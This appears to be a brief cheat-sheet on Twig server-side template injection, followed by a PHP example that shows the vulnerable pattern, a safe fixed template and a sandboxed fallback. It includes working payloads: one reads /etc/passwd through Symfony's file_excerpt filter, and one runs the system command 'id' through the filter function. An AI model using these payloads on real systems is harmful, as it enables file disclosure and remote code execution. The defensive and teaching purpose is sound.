Information Disclosure

In Twig, we can use the _self keyword to obtain some information about the current template:

{{ _self }}

LFI

The PHP web framework Symfony defines additional Twig filters. One of them, file_excerpt, can be used to read local files:

{{ "/etc/passwd"|file_excerpt(1,-1) }}

RCE

To achieve remote code execution, we can pass the name of a PHP built-in function such as system to a Twig filter that accepts a callable:

{{ ['id'] | filter('system') }}
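As an added example (not from the original page), the PHP pattern that makes the payloads above work, next to the safe pattern and a sandboxed fallback for the case where templates really must come from users; it assumes Twig 3 installed via Composer, and the template name is made up:

```php
<?php
// Added example, not from the original page. Assumes Twig 3 via Composer;
// "greeting.html.twig" and the $_GET parameter name are made up.
require 'vendor/autoload.php';

use Twig\Environment;
use Twig\Loader\ArrayLoader;
use Twig\Extension\SandboxExtension;
use Twig\Sandbox\SecurityPolicy;
use Twig\Sandbox\SecurityError;

$userInput = $_GET['name'] ?? 'guest';

// VULNERABLE: user input becomes template *source*, so any "{{ ... }}" in it
// is compiled and evaluated by Twig with every registered filter available.
$twig = new Environment(new ArrayLoader());
$html = $twig->createTemplate('Hello ' . $userInput)->render([]);

// SAFE: the template is fixed; user input is only ever a *variable* and is
// auto-escaped on output. Template syntax inside $userInput is never evaluated.
$twig = new Environment(new ArrayLoader([
    'greeting.html.twig' => 'Hello {{ name }}',
]), ['autoescape' => 'html']);
$html = $twig->render('greeting.html.twig', ['name' => $userInput]);

// DEFENSE IN DEPTH: if user-supplied templates are a requirement, render them
// in Twig's sandbox with an explicit allow-list. Neither "filter" nor
// "file_excerpt" is listed, so the payloads above throw SecurityError.
$policy = new SecurityPolicy(
    ['if', 'for'],                 // allowed tags
    ['escape', 'upper', 'length'], // allowed filters
    [],                            // allowed methods on objects
    [],                            // allowed properties on objects
    ['range']                      // allowed functions
);
$sandboxed = new Environment(new ArrayLoader());
$sandboxed->addExtension(new SandboxExtension($policy, true)); // true = always sandboxed
try {
    $html = $sandboxed->createTemplate($userInput)->render([]);
} catch (SecurityError $e) {
    // Log the rejected template source for detection purposes and do not render it.
    error_log('Rejected user template: ' . $e->getMessage());
    $html = 'Template rejected';
}
echo $html;
```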